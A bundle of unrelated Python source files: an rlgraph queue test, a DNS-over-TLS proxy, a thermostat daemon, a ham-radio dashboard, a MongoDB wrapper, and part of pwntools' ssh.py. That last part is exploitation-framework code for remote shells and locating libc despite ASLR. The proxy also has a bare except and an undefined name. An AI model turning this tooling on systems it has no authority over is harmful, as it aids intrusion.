from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import threading
import time
import unittest
from rlgraph.components.memories.fifo_queue import FIFOQueue
from rlgraph.spaces import Dict, BoolBox, Tuple
from rlgraph.tests import ComponentTest
from rlgraph.utils.ops import flatten_op, unflatten_op
class TestFIFOQueue(unittest.TestCase):
"""
Tests sampling and insertion behaviour of the FIFOQueue class.
"""
record_space = Dict(
states=dict(state1=float, state2=float, state3=bool),
actions=dict(action1=float, action2=Tuple(float, float)),
reward=float,
terminals=BoolBox(),
add_batch_rank=True
)
capacity = 10
input_spaces = dict(
records=record_space,
num_records=int
)
def test_enqueue_dequeue(self):
"""
Simply tests insert op without checking internal logic.
"""
fifo_queue = FIFOQueue(capacity=self.capacity, record_space=self.record_space)
test = ComponentTest(component=fifo_queue, input_spaces=self.input_spaces)
first_record = self.record_space.sample(size=1)
test.test(("insert_records", first_record), expected_outputs=None)
test.test("get_size", expected_outputs=1)
further_records = self.record_space.sample(size=5)
test.test(("insert_records", further_records), expected_outputs=None)
test.test("get_size", expected_outputs=6)
expected = dict()
for (k1, v1), (k2, v2) in zip(flatten_op(first_record).items(), flatten_op(further_records).items()):
expected[k1] = np.concatenate((v1, v2[:4]))
expected = unflatten_op(expected)
test.test(("get_records", 5), expected_outputs=expected)
test.test("get_size", expected_outputs=1)
def test_capacity(self):
"""
Tests if insert correctly blocks when capacity is reached.
"""
fifo_queue = FIFOQueue(capacity=self.capacity, record_space=self.record_space)
test = ComponentTest(component=fifo_queue, input_spaces=self.input_spaces)
def run(expected_):
# Wait n seconds.
time.sleep(2)
# Pull something out of the queue again to continue.
test.test(("get_records", 2), expected_outputs=expected_)
# Insert one more element than capacity
records = self.record_space.sample(size=self.capacity + 1)
expected = dict()
for key, value in flatten_op(records).items():
expected[key] = value[:2]
expected = unflatten_op(expected)
# Start thread to save this one from getting stuck due to capacity overflow.
thread = threading.Thread(target=run, args=(expected,))
thread.start()
print("Going over capacity: blocking ...")
test.test(("insert_records", records), expected_outputs=None)
print("Dequeued some items in another thread. Unblocked.")
thread.join()
def test_fifo_queue_with_distributed_tf(self):
"""
Tests if FIFO is correctly shared between two processes running in distributed tf.
"""
cluster_spec = dict(source=["localhost:22222"], target=["localhost:22223"])
def run1():
fifo_queue_1 = FIFOQueue(capacity=self.capacity, device="/job:source/task:0/cpu")
test_1 = ComponentTest(component=fifo_queue_1, input_spaces=self.input_spaces, execution_spec=dict(
mode="distributed",
distributed_spec=dict(job="source", task_index=0, cluster_spec=cluster_spec)
))
# Insert elements from source.
records = self.record_space.sample(size=self.capacity)
print("inserting into source-side queue ...")
test_1.test(("insert_records", records), expected_outputs=None)
print("size of source-side queue:")
print(test_1.test("get_size", expected_outputs=None))
# Pull one sample out.
print("pulling from source-side queue:")
print(test_1.test(("get_records", 2), expected_outputs=None))
test_1.terminate()
def run2():
fifo_queue_2 = FIFOQueue(capacity=self.capacity, device="/job:source/task:0/cpu")
test_2 = ComponentTest(component=fifo_queue_2, input_spaces=self.input_spaces, execution_spec=dict(
mode="distributed",
distributed_spec=dict(job="target", task_index=0, cluster_spec=cluster_spec)
))
# Dequeue elements in target.
print("size of target-side queue:")
print(test_2.test("get_size", expected_outputs=None))
print("pulling from target-side queue:")
print(test_2.test(("get_records", 5), expected_outputs=None))
test_2.terminate()
# Start thread to save this one from getting stuck due to capacity overflow.
thread_1 = threading.Thread(target=run1)
thread_2 = threading.Thread(target=run2)
thread_1.start()
thread_2.start()
thread_1.join()
thread_2.join()
|
dnsOverTlsProxy.py | from dnsOverTlsApp import dot
import socket
import threading
from logger import logger
class DnsProxyServer(object):
def __init__(self, host, port):
""" Initialization of each socket attributes"""
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
def resolve(self, url):
"""Function resolves a url/domain to the Corresponding DNS Record
Since We are using TCP DNS We PREPEND The length of the message (packet_length) REF - RFC7766 #section-8
Establishes a TLS conn with cloudfare and returns the Response
@params - url - the domain/url/hostname
"""
dnsTLdObj = dot()
tcp_packet = dnsTLdObj.buildPacket(url).encode("hex")
packet_length = dnsTLdObj.getLength(tcp_packet)
message = packet_length + tcp_packet
conn = dnsTLdObj.connect()
dns_response = dnsTLdObj.sendMessage(message, conn)
ip = dnsTLdObj.extractIp(dns_response)
return ip
def listen(self):
"""Function creates different Threads for parallel socket processing via python inbuilt threading """
self.sock.listen(5)
while True:
client, address = self.sock.accept()
client.settimeout(60)
threading.Thread(target=self.listenToClient, args=(client, address)).start()
def listenToClient(self, client, address):
"""Function will listen to client on TCP 53 and check for messages with format "domain:url" and calls resolve subroutine
@params client - The TCP client which will talk to the callee
"""
size = 1024
while True:
try:
data = client.recv(size)
logger.debug(data)
if data:
query = str(data).split(":")
if query[0] == 'domain':
# Set the response to echo back the recieved data
url = query[1]
dns_response = self.resolve(url)
logger.info("{0} retrieved for DNS query on {1}".format(dns_response, url))
client.send(dns_response)
else:
raise error('Client disconnected')
except:
client.close()
return False
if __name__ == "__main__":
port_num = 53
DnsProxyServer('', port_num).listen()
|
evaluate_therm_daemon.py | from django.core.management.base import BaseCommand, CommandError
from django_thermostat.rules import evaluate
from time import localtime, strftime, sleep
#import threading
import multiprocessing
import logging
from django.conf import settings
logger = logging.getLogger("thermostat.rules")
logger.setLevel(settings.LOG_LEVEL)
class Command(BaseCommand):
args = '<sleep_time>'
help = 'Evaluate rules realted to heater status. The result will start or stop the heater. It will loop and sleep for sleep_time seconds'
def handle(self, *args, **options):
try:
p = multiprocessing.current_process()
p.name = "main_therm_daemon"
if len(args) != 1:
raise ValueError("Missing sleep_time")
while(True):
logger.info("Starting at %s" % strftime("%d.%m.%Y %H:%M:%S", localtime()))
d = multiprocessing.Process(name='therm_daemon', target=evaluate)
d.daemon = True
logger.debug("Created subprocess object")
d.start()
logging.info("Subprocess started, main process sleeping for the next %s seconds" % args[0])
sleep(float(args[0]))
except Exception as ex:
self.stderr.write("ERROR: %s" % ex)
logger.error("Error: %s" % ex)
|
dashboard.py | #!/usr/bin/python3
"""
n1mm_view dashboard
This program displays QSO statistics collected by the collector.
"""
from datetime import datetime
import logging
import os
import gc
import multiprocessing
import pygame
import sqlite3
import sys
import time
import config
import dataaccess
import graphics
__author__ = 'Jeffrey B. Otterson, N1KDO'
__copyright__ = 'Copyright 2016, 2017, 2019 Jeffrey B. Otterson'
__license__ = 'Simplified BSD'
LOGO_IMAGE_INDEX = 0
QSO_COUNTS_TABLE_INDEX = 1
QSO_RATES_TABLE_INDEX = 2
QSO_OPERATORS_PIE_INDEX = 3
QSO_OPERATORS_TABLE_INDEX = 4
QSO_STATIONS_PIE_INDEX = 5
QSO_BANDS_PIE_INDEX = 6
QSO_MODES_PIE_INDEX = 7
QSO_RATE_CHART_IMAGE_INDEX = 8
SECTIONS_WORKED_MAP_INDEX = 9
IMAGE_COUNT = 10
IMAGE_MESSAGE = 1
CRAWL_MESSAGE = 2
IMAGE_FORMAT = 'RGB'
SAVE_PNG = False
logging.basicConfig(format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S',
level=config.LOG_LEVEL)
logging.Formatter.converter = time.gmtime
def load_data(size, q, last_qso_timestamp):
"""
load data from the database tables
"""
logging.debug('load data')
qso_operators = []
qso_stations = []
qso_band_modes = []
operator_qso_rates = []
qsos_per_hour = []
qsos_by_section = {}
db = None
data_updated = False
try:
logging.debug('connecting to database')
db = sqlite3.connect(config.DATABASE_FILENAME)
cursor = db.cursor()
logging.debug('database connected')
# get timestamp from the last record in the database
last_qso_time, message = dataaccess.get_last_qso(cursor)
logging.debug('old_timestamp = %d, timestamp = %d', last_qso_timestamp, last_qso_time)
if last_qso_time != last_qso_timestamp:
logging.debug('data updated!')
data_updated = True
q.put((CRAWL_MESSAGE, 3, message))
# load qso_operators
qso_operators = dataaccess.get_operators_by_qsos(cursor)
# load qso_stations -- maybe useless chartjunk
qso_stations = dataaccess.get_station_qsos(cursor)
# get something else.
qso_band_modes = dataaccess.get_qso_band_modes(cursor)
# load QSOs per Hour by Operator
operator_qso_rates = dataaccess.get_qsos_per_hour_per_operator(cursor, last_qso_time)
# load QSO rates per Hour by Band
qsos_per_hour, qsos_per_band = dataaccess.get_qsos_per_hour_per_band(cursor)
# load QSOs by Section # This has to be done even if no new QSO to advance gray line and since the map is always drawn.
qsos_by_section = dataaccess.get_qsos_by_section(cursor)
q.put((CRAWL_MESSAGE, 0, ''))
logging.debug('load data done')
except sqlite3.OperationalError as error:
logging.exception(error)
q.put((CRAWL_MESSAGE, 0, 'database read error', graphics.YELLOW, graphics.RED))
return
finally:
if db is not None:
logging.debug('Closing DB')
cursor.close()
db.close()
db = None
if data_updated:
try:
image_data, image_size = graphics.qso_summary_table(size, qso_band_modes)
enqueue_image(q, QSO_COUNTS_TABLE_INDEX, image_data, image_size)
except Exception as e:
logging.exception(e)
try:
image_data, image_size = graphics.qso_rates_table(size, operator_qso_rates)
enqueue_image(q, QSO_RATES_TABLE_INDEX, image_data, image_size)
except Exception as e:
logging.exception(e)
try:
image_data, image_size = graphics.qso_operators_graph(size, qso_operators)
enqueue_image(q, QSO_OPERATORS_PIE_INDEX, image_data, image_size)
except Exception as e:
logging.exception(e)
try:
image_data, image_size = graphics.qso_operators_table(size, qso_operators)
enqueue_image(q, QSO_OPERATORS_TABLE_INDEX, image_data, image_size)
except Exception as e:
logging.exception(e)
try:
image_data, image_size = graphics.qso_stations_graph(size, qso_stations)
enqueue_image(q, QSO_STATIONS_PIE_INDEX, image_data, image_size)
except Exception as e:
logging.exception(e)
try:
image_data, image_size = graphics.qso_bands_graph(size, qso_band_modes)
enqueue_image(q, QSO_BANDS_PIE_INDEX, image_data, image_size)
except Exception as e:
logging.exception(e)
try:
image_data, image_size = graphics.qso_modes_graph(size, qso_band_modes)
enqueue_image(q, QSO_MODES_PIE_INDEX, image_data, image_size)
except Exception as e:
logging.exception(e)
try:
image_data, image_size = graphics.qso_rates_chart(size, qsos_per_hour)
enqueue_image(q, QSO_RATE_CHART_IMAGE_INDEX, image_data, image_size)
except Exception as e:
logging.exception(e)
try:
image_data, image_size = graphics.draw_map(size, qsos_by_section)
enqueue_image(q, SECTIONS_WORKED_MAP_INDEX, image_data, image_size)
gc.collect()
except Exception as e:
logging.exception(e)
return last_qso_time
def enqueue_image(q, image_id, image_data, size):
if image_data is not None:
q.put((IMAGE_MESSAGE, image_id, image_data, size))
def delta_time_to_string(delta_time):
"""
return a string that represents delta time
"""
seconds = delta_time.total_seconds()
days, seconds = divmod(seconds, 86400)
hours, seconds = divmod(seconds, 3600)
minutes, seconds = divmod(seconds, 60)
if days != 0:
return '%d days, %02d:%02d:%02d' % (days, hours, minutes, seconds)
else:
return '%02d:%02d:%02d' % (hours, minutes, seconds)
def update_crawl_message(crawl_messages):
crawl_messages.set_message(0, config.EVENT_NAME)
crawl_messages.set_message_colors(0, graphics.BRIGHT_BLUE, graphics.BLACK)
now = datetime.utcnow()
crawl_messages.set_message(1, datetime.strftime(now, '%H:%M:%S'))
if now < config.EVENT_START_TIME:
delta = config.EVENT_START_TIME - now
seconds = delta.total_seconds()
bg = graphics.BLUE if seconds > 3600 else graphics.RED
crawl_messages.set_message(2, '%s starts in %s' % (config.EVENT_NAME, delta_time_to_string(delta)))
crawl_messages.set_message_colors(2, graphics.WHITE, bg)
elif now < config.EVENT_END_TIME:
delta = config.EVENT_END_TIME - now
seconds = delta.total_seconds()
fg = graphics.YELLOW if seconds > 3600 else graphics.ORANGE
crawl_messages.set_message(2, '%s ends in %s' % (config.EVENT_NAME, delta_time_to_string(delta)))
crawl_messages.set_message_colors(2, fg, graphics.BLACK)
else:
crawl_messages.set_message(2, '%s is over.' % config.EVENT_NAME)
crawl_messages.set_message_colors(2, graphics.RED, graphics.BLACK)
class CrawlMessages:
"""
class to manage a crawl of varied text messages on the bottom of the display
"""
def __init__(self, screen, size):
self.screen = screen
self.size = size
self.messages = [''] * 10
self.message_colors = [(graphics.GREEN, graphics.BLACK)] * 10
self.message_surfaces = None
self.last_added_index = -1
self.first_x = -1
def set_message(self, index, message):
if index >= 0 and index < len(self.messages):
self.messages[index] = message
def set_message_colors(self, index, fg, bg):
if index >= 0 and index < len(self.messages):
self.message_colors[index] = (fg, bg)
def crawl_message(self):
if self.message_surfaces is None:
self.message_surfaces = [graphics.view_font.render(' ' + self.messages[0] + ' ', True,
self.message_colors[0][0],
self.message_colors[0][1])]
self.first_x = self.size[0]
self.last_added_index = 0
self.first_x -= 2 # JEFF
rect = self.message_surfaces[0].get_rect()
if self.first_x + rect.width < 0:
self.message_surfaces = self.message_surfaces[1:]
self.first_x = 0
x = self.first_x
for surf in self.message_surfaces:
rect = surf.get_rect()
x = x + rect.width
while x < self.size[0]:
self.last_added_index += 1
if self.last_added_index >= len(self.messages):
self.last_added_index = 0
if self.messages[self.last_added_index] != '':
surf = graphics.view_font.render(' ' + self.messages[self.last_added_index] + ' ', True,
self.message_colors[self.last_added_index][0],
self.message_colors[self.last_added_index][1])
rect = surf.get_rect()
self.message_surfaces.append(surf)
x += rect.width
x = self.first_x
for surf in self.message_surfaces:
rect = surf.get_rect()
rect.bottom = self.size[1] - 1
rect.left = x
self.screen.blit(surf, rect)
x += rect.width
if x >= self.size[0]:
break
def update_charts(q, event, size):
try:
os.nice(10)
except AttributeError:
logging.warn("can't be nice to windows")
q.put((CRAWL_MESSAGE, 4, 'Chart engine starting...'))
last_qso_timestamp = 0
q.put((CRAWL_MESSAGE, 4, ''))
try:
while not event.is_set():
t0 = time.time()
last_qso_timestamp = load_data(size, q, last_qso_timestamp)
t1 = time.time()
delta = t1 - t0
update_delay = config.DATA_DWELL_TIME - delta
if update_delay < 0:
update_delay = config.DATA_DWELL_TIME
logging.debug('Next data update in %f seconds', update_delay)
event.wait(update_delay)
except Exception as e:
logging.exception('Exception in update_charts', exc_info=e)
q.put((CRAWL_MESSAGE, 4, 'Chart engine failed.', graphics.YELLOW, graphics.RED))
def change_image(screen, size, images, image_index, delta):
while True:
image_index += delta
if image_index >= len(images):
image_index = 0
elif image_index < 0:
image_index = len(images) - 1
if images[image_index] is not None:
break
graphics.show_graph(screen, size, images[image_index])
return image_index
def main():
logging.info('dashboard startup')
last_qso_timestamp = 0
q = multiprocessing.Queue()
process_event = multiprocessing.Event()
images = [None] * IMAGE_COUNT
try:
screen, size = graphics.init_display()
except Exception as e:
logging.exception('Could not initialize display.', exc_info=e)
sys.exit(1)
display_size = (size[0], size[1] - graphics.view_font_height)
logging.debug('display setup')
images[LOGO_IMAGE_INDEX] = pygame.image.load('logo.png')
crawl_messages = CrawlMessages(screen, size)
update_crawl_message(crawl_messages)
proc = multiprocessing.Process(name='image-updater', target=update_charts, args=(q, process_event, display_size))
proc.start()
try:
image_index = LOGO_IMAGE_INDEX
graphics.show_graph(screen, size, images[LOGO_IMAGE_INDEX])
pygame.time.set_timer(pygame.USEREVENT, 1000)
run = True
paused = False
display_update_timer = config.DISPLAY_DWELL_TIME
clock = pygame.time.Clock()
while run:
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
break
elif event.type == pygame.USEREVENT:
display_update_timer -= 1
if display_update_timer < 1:
if paused:
graphics.show_graph(screen, size, images[image_index])
else:
image_index = change_image(screen, size, images, image_index, 1)
display_update_timer = config.DISPLAY_DWELL_TIME
update_crawl_message(crawl_messages)
elif event.type == pygame.KEYDOWN:
if event.key == ord('q'):
logging.debug('Q key pressed')
run = False
elif event.key == ord('n') or event.key == 275:
logging.debug('next key pressed')
image_index = change_image(screen, size, images, image_index, 1)
display_update_timer = config.DISPLAY_DWELL_TIME
elif event.key == ord('p') or event.key == 276:
logging.debug('prev key pressed')
image_index = change_image(screen, size, images, image_index, -1)
display_update_timer = config.DISPLAY_DWELL_TIME
elif event.key == 302:
logging.debug('scroll lock key pressed')
if paused:
image_index = change_image(screen, size, images, image_index, 1)
display_update_timer = config.DISPLAY_DWELL_TIME
paused = not paused
else:
logging.debug('event key=%d', event.key)
while not q.empty():
payload = q.get()
message_type = payload[0]
if message_type == IMAGE_MESSAGE:
n = payload[1]
image = payload[2]
image_size = payload[3]
images[n] = pygame.image.frombuffer(image, image_size, IMAGE_FORMAT)
logging.debug('received image %d', n)
elif message_type == CRAWL_MESSAGE:
n = payload[1]
message = payload[2]
fg = graphics.CYAN
bg = graphics.BLACK
if len(payload) > 3:
fg = payload[3]
if len(payload) > 4:
bg = payload[4]
crawl_messages.set_message(n, message)
crawl_messages.set_message_colors(n, fg, bg)
crawl_messages.crawl_message()
pygame.display.flip()
clock.tick(60)
pygame.time.set_timer(pygame.USEREVENT, 0)
except Exception as e:
logging.exception("Exception in main:", exc_info=e)
pygame.display.quit()
logging.debug('stopping update process')
process_event.set()
logging.debug('waiting for update process to stop...')
proc.join(60)
if proc.is_alive():
logging.warn('chart engine did not exit upon request, killing.')
proc.terminate()
logging.debug('update thread has stopped.')
logging.info('dashboard exit')
if __name__ == '__main__':
main()
|
MongoRepository.py | import cPickle as pickle
import logging
import os
import time
from threading import Lock, Thread
from pymongo import MongoClient
class MongoRepository(object):
def __init__(self, connection_string, database, collection, resume_token_path='resume_token.bin', logger_name=None, *time_fields):
"""
MongoCollection wrapper class to allow easy specialized updates.
:param connection_string: MongoDB connection string
:param database: Database to use
:param collection: Collection to use
:param resume_token_path: File path to the resume token file. This file is needed to resume consumption
of the event stream after new start of the process. Default value is "resume_token.bin" in the current directory.
:param time_fields: Any timeFields that should be set to the current time whenever the collection is updated
"""
client = MongoClient(connection_string, document_class=dict)
db = client[database]
self.coll = db[collection]
self.time_fields = list(time_fields)
self.save_lock = Lock()
self.last_save = time.time()
self.save_interval = 5
self.logger = logging.getLogger(logger_name)
self.resume_token_path = resume_token_path
def get(self, key, value):
"""
Get all documents from the collection that match document[key] == value
:param key: The name of the key
:param value: The value that the property must have
:return: Instance of cursor corresponding to the query
"""
return self.coll.find({key: value})
def get_by_id(self, doc_id):
"""
Gets a document from the collection by ID.
:param doc_id: The document ID
:return: The document (if it exists)
"""
return self.get('_id', doc_id)[0]
def get_multiple_by_ids(self, ids):
"""
Get multiple documents by their IDs.
:param ids: All IDs that should be found
:return: Instance of cursor corresponding to the query
"""
return self.coll.find({'_id': {'$in': ids}})
def insert(self, doc_id, doc):
"""
Insert a document into the collection.
:param doc_id: ID of the document
:param doc: A dictionary representing a document
"""
if '_id' not in doc:
doc['_id'] = doc_id
self.coll.insert_one(doc)
def update(self, doc_id, data, *time_fields):
"""
Updates a document and (optionally) updates timestamps in the document.
:param doc_id: The ID of the document to update
:param data: A dictionary with all updates to make
:param time_fields: All properties that should have their value set to the current time
"""
update_dict = self._get_base_update_dict(*time_fields)
update_dict['$set'] = data
self.coll.update_one({'_id': doc_id}, update_dict, upsert=True)
def update_key_value(self, doc_id, key, value, *time_fields):
"""
Updates a document and (optionally) updates timestamps in the document.
:param doc_id: The ID of the document to update
:param key: The key of the property to update
:param value: The new value of the given property
:param time_fields: All properties that should have their value set to the current time
"""
update_dict = self._get_base_update_dict(*time_fields)
update_dict['$set'] = {key: value}
self.coll.update_one({'_id': doc_id}, update_dict, upsert=True)
def increment(self, doc_id, key, value, *time_fields):
"""
Increment the value of a property in a document.
:param doc_id: The ID of the document to update
:param key: The key of the property to increment
:param value: The increment value
:param time_fields: All properties that should have their value set to the current time
"""
update_dict = self._get_base_update_dict(*time_fields)
update_dict['$inc'] = {key: value}
self.coll.update_one({'_id': doc_id}, update_dict, upsert=True)
def add_to_set(self, doc_id, key, value, *time_fields):
"""
Adds the given value to the set with the given key.
:param doc_id: The ID of the document to update
:param key: The key of the set
:param value: The value to add to the set
:param time_fields: All properties that should have their value set to the current time
"""
update_dict = self._get_base_update_dict(*time_fields)
update_dict['$addToSet'] = {key: value}
self.coll.update_one({'_id': doc_id}, update_dict)
def watch(self, match, resume=True):
"""
Watch the collection using a filter.
:param match: BSON document specifying the filter criteria
:param resume: Whether to resume the stream from where it stopped last time
:return: A stream of documents as they get inserted/replaced/updated
"""
if resume:
resume_token = self._load_resume_token()
if resume_token is not None:
try:
self.logger.info('Successfully loaded resume token')
watch = self.coll.watch([{'$match': match}], full_document='updateLookup',
resume_after=resume_token)
self.logger.info('Successfully resumed watch')
return watch
except:
self.logger.warning('Unable to resume, probably because the oplog is too small. Trying again '
'without resuming...')
return self.watch(match, resume=False)
watch = self.coll.watch([{'$match': match}], full_document='updateLookup')
self.logger.info('Successfully started watch')
return watch
def start_process(self, doc_id, process_name, *time_fields):
"""
Manually start a process
:param doc_id: The ID of the affected document
:param process_name: The name of the process to be started
:param time_fields: All properties that should have their value set to the current time
"""
updates = {'{}.success'.format(process_name): False, '{}.isRunning'.format(process_name): True}
all_time_fields = list(time_fields)
all_time_fields.append('{}.startTime'.format(process_name))
self.update(doc_id, updates, *all_time_fields)
def end_process(self, doc_id, process_name, success, results, *time_fields):
"""
Manually end a process
:param doc_id: The ID of the affected document
:param process_name: The name of the process to be ended
:param success: Whether the process executed successfully
:param results: Any results to save with the process
:param time_fields: All properties that should have their value set to the current time
"""
updates = {'{}.success'.format(process_name): success, '{}.isRunning'.format(process_name): False}
for key in results:
updates['{}.{}'.format(process_name, key)] = results[key]
all_time_fields = list(time_fields)
all_time_fields.append('{}.endTime'.format(process_name))
self.update(doc_id, updates, *all_time_fields)
def register_time_field(self, *time_fields):
self.time_fields.extend(time_fields)
def _get_base_update_dict(self, *time_fields):
update_dict = dict()
if time_fields is not None and len(time_fields) > 0:
if '$currentDate' not in update_dict:
update_dict['$currentDate'] = dict()
for time_field in time_fields:
update_dict['$currentDate'][time_field] = True
if self.time_fields is not None and len(self.time_fields) > 0:
if '$currentDate' not in update_dict:
update_dict['$currentDate'] = dict()
for time_field in self.time_fields:
update_dict['$currentDate'][time_field] = True
return update_dict
def save_resume_token(self, doc):
if self.save_lock.acquire():
Thread(target=self._save_resume_token, args=[doc]).start()
self.save_lock.release()
def _save_resume_token(self, doc):
if time.time() - self.last_save > self.save_interval:
resume_token = doc.get('_id')
with open(self.resume_token_path, 'wb') as token_file:
pickle.dump(resume_token, token_file)
self.last_save = time.time()
def _load_resume_token(self):
resume_token = None
if self.save_lock.acquire():
try:
with open(self.resume_token_path, 'rb') as token_file:
resume_token = pickle.load(token_file)
except:
self.logger.exception('Unable to load resume token')
self.save_lock.release()
else:
raise IOError('Unable to acquire lock for loading resume token!')
return resume_token
|
ssh.py | from __future__ import absolute_import
from __future__ import division
import inspect
import logging
import os
import re
import shutil
import six
import string
import sys
import tarfile
import tempfile
import threading
import time
import types
from pwnlib import term
from pwnlib.context import context
from pwnlib.log import Logger
from pwnlib.log import getLogger
from pwnlib.term import text
from pwnlib.timeout import Timeout
from pwnlib.tubes.sock import sock
from pwnlib.util import hashes
from pwnlib.util import misc
from pwnlib.util import safeeval
from pwnlib.util.sh_string import sh_string
# Kill the warning line:
# No handlers could be found for logger "paramiko.transport"
paramiko_log = logging.getLogger("paramiko.transport")
h = logging.StreamHandler(open(os.devnull,'w+'))
h.setFormatter(logging.Formatter())
paramiko_log.addHandler(h)
class ssh_channel(sock):
#: Parent :class:`ssh` object
parent = None
#: Remote host
host = None
#: Return code, or :const:`None` if the process has not returned
#: Use :meth:`poll` to check.
returncode = None
#: :const:`True` if a tty was allocated for this channel
tty = False
#: Environment specified for the remote process, or :const:`None`
#: if the default environment was used
env = None
#: Command specified for the constructor
process = None
def __init__(self, parent, process = None, tty = False, wd = None, env = None, raw = True, *args, **kwargs):
super(ssh_channel, self).__init__(*args, **kwargs)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.returncode = None
self.host = parent.host
self.tty = tty
self.env = env
self.process = process
self.cwd = wd or '.'
if isinstance(wd, six.text_type):
wd = context._encode(wd)
env = env or {}
msg = 'Opening new channel: %r' % (process or 'shell')
if isinstance(process, (list, tuple)):
process = b' '.join(context._encode(sh_string(s)) for s in process)
if isinstance(process, six.text_type):
process = context._encode(process)
if process and wd:
process = b'cd ' + sh_string(wd) + b' >/dev/null 2>&1;' + process
if process and env:
for name, value in env.items():
nameb = context._encode(name)
if not re.match(b'^[a-zA-Z_][a-zA-Z0-9_]*$', nameb):
self.error('run(): Invalid environment key %r' % name)
export = b'export %s=%s;' % (nameb, sh_string(context._encode(value)))
process = export + process
if process and tty:
if raw:
process = b'stty raw -ctlecho -echo; ' + process
else:
process = b'stty -ctlecho -echo; ' + process
# If this object is enabled for DEBUG-level logging, don't hide
# anything about the command that's actually executed.
if process and self.isEnabledFor(logging.DEBUG):
msg = 'Opening new channel: %r' % ((process,) or 'shell')
with self.waitfor(msg) as h:
import paramiko
try:
self.sock = parent.transport.open_session()
except paramiko.ChannelException as e:
if e.args == (1, 'Administratively prohibited'):
self.error("Too many sessions open! Use ssh_channel.close() or 'with'!")
raise e
if self.tty:
self.sock.get_pty('xterm', term.width, term.height)
def resizer():
if self.sock:
try:
self.sock.resize_pty(term.width, term.height)
except paramiko.ssh_exception.SSHException:
pass
self.resizer = resizer
term.term.on_winch.append(self.resizer)
else:
self.resizer = None
# Put stderr on stdout. This might not always be desirable,
# but our API does not support multiple streams
self.sock.set_combine_stderr(True)
self.settimeout(self.timeout)
if process:
self.sock.exec_command(process)
else:
self.sock.invoke_shell()
h.success()
def kill(self):
"""kill()
Kills the process.
"""
self.close()
def recvall(self, timeout = sock.forever):
# We subclass tubes.sock which sets self.sock to None.
#
# However, we need to wait for the return value to propagate,
# which may not happen by the time .close() is called by tube.recvall()
tmp_sock = self.sock
tmp_close = self.close
self.close = lambda: None
timeout = self.maximum if self.timeout is self.forever else self.timeout
data = super(ssh_channel, self).recvall(timeout)
# Restore self.sock to be able to call wait()
self.close = tmp_close
self.sock = tmp_sock
self.wait()
self.close()
# Again set self.sock to None
self.sock = None
return data
def wait(self, timeout=sock.default):
# TODO: deal with timeouts
return self.poll(block=True)
def poll(self, block=False):
"""poll() -> int
Poll the exit code of the process. Will return None, if the
process has not yet finished and the exit code otherwise.
"""
if self.returncode is None and self.sock \
and (block or self.sock.exit_status_ready()):
while not self.sock.status_event.is_set():
self.sock.status_event.wait(0.05)
self.returncode = self.sock.recv_exit_status()
return self.returncode
def can_recv_raw(self, timeout):
with self.countdown(timeout):
while self.countdown_active():
if self.sock.recv_ready():
return True
time.sleep(min(self.timeout, 0.05))
return False
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
If not in TTY-mode, this does exactly the same as
meth:`pwnlib.tubes.tube.tube.interactive`, otherwise
it does mostly the same.
An SSH connection in TTY-mode will typically supply its own prompt,
thus the prompt argument is ignored in this case.
We also have a few SSH-specific hacks that will ideally be removed
once the :mod:`pwnlib.term` is more mature.
"""
# If we are only executing a regular old shell, we need to handle
# control codes (specifically Ctrl+C).
#
# Otherwise, we can just punt to the default implementation of interactive()
if self.process is not None:
return super(ssh_channel, self).interactive(prompt)
self.info('Switching to interactive mode')
# We would like a cursor, please!
term.term.show_cursor()
event = threading.Event()
def recv_thread(event):
while not event.is_set():
try:
cur = self.recv(timeout = 0.05)
cur = cur.replace(b'\r\n',b'\n')
cur = cur.replace(b'\r',b'')
if cur is None:
continue
elif cur == b'\a':
# Ugly hack until term unstands bell characters
continue
stdout = sys.stdout
if not term.term_mode:
stdout = getattr(stdout, 'buffer', stdout)
stdout.write(cur)
stdout.flush()
except EOFError:
self.info('Got EOF while reading in interactive')
event.set()
break
t = context.Thread(target = recv_thread, args = (event,))
t.daemon = True
t.start()
while not event.is_set():
if term.term_mode:
try:
data = term.key.getraw(0.1)
except KeyboardInterrupt:
data = [3] # This is ctrl-c
except IOError:
if not event.is_set():
raise
else:
stdin = getattr(sys.stdin, 'buffer', sys.stdin)
data = stdin.read(1)
if not data:
event.set()
else:
data = bytearray(data)
if data:
try:
self.send(bytes(bytearray(data)))
except EOFError:
event.set()
self.info('Got EOF while sending in interactive')
while t.is_alive():
t.join(timeout = 0.1)
# Restore
term.term.hide_cursor()
def close(self):
self.poll()
while self.resizer in term.term.on_winch:
term.term.on_winch.remove(self.resizer)
super(ssh_channel, self).close()
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def _close_msg(self):
self.info('Closed SSH channel with %s' % self.host)
class ssh_process(ssh_channel):
#: Working directory
cwd = None
#: PID of the process
#: Only valid when instantiated through :meth:`ssh.process`
pid = None
#: Executable of the procesks
#: Only valid when instantiated through :meth:`ssh.process`
executable = None
#: Arguments passed to the process
#: Only valid when instantiated through :meth:`ssh.process`
argv = None
def libs(self):
"""libs() -> dict
Returns a dictionary mapping the address of each loaded library in the
process's address space.
If ``/proc/$PID/maps`` cannot be opened, the output of ldd is used
verbatim, which may be different than the actual addresses if ASLR
is enabled.
"""
maps = self.parent.libs(self.executable)
maps_raw = self.parent.cat('/proc/%d/maps' % self.pid).decode()
for lib in maps:
remote_path = lib.split(self.parent.host)[-1]
for line in maps_raw.splitlines():
if line.endswith(remote_path):
address = line.split('-')[0]
maps[lib] = int(address, 16)
break
return maps
@property
def libc(self):
"""libc() -> ELF
Returns an ELF for the libc for the current process.
If possible, it is adjusted to the correct address
automatically.
Examples:
>>> s = ssh(host='example.pwnme')
>>> p = s.process('true')
>>> p.libc # doctest: +ELLIPSIS
ELF(.../libc.so.6')
"""
from pwnlib.elf import ELF
for lib, address in self.libs().items():
if 'libc.so' in lib:
e = ELF(lib)
e.address = address
return e
@property
def elf(self):
"""elf() -> pwnlib.elf.elf.ELF
Returns an ELF file for the executable that launched the process.
"""
import pwnlib.elf.elf
libs = self.parent.libs(self.executable)
for lib in libs:
